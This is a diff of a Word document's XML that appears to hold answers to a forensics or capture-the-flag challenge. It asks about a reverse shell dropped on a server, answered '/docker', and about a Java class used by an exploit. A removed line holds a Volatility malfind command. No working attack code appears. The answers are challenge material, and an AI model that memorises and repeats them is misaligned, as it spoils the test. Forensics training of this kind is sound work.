+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3153410"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Attackers</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>usually</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>leave</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>traces</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>disk</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>What</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>reverse</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>executable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>dropped</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="22"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Get</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>docker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D114FE9" wp14:editId="3FDC315E">
+            <wp:extent cx="5943600" cy="3147060"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="555699437" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="555699437" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -366,162 +3112,214 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="15"/>
-        </w:numPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>$ vol -f "192-Reveal.dmp" windows.malfind</w:t>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:cs="Lucida Console"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:cs="Lucida Console"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q6</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:cs="Lucida Console"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>What</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Java</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>class</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>was</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>invoked</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>by</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the XML </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to run the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>exploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:cs="Lucida Console"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:cs="Lucida Console"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:cs="Lucida Console"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:cs="Lucida Console"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:cs="Lucida Console"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:cs="Lucida Console"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:cs="Lucida Console"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:vanish/>
@@ -532,87 +3330,14 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Top of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:vanish/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Bottom of Form</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Q2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
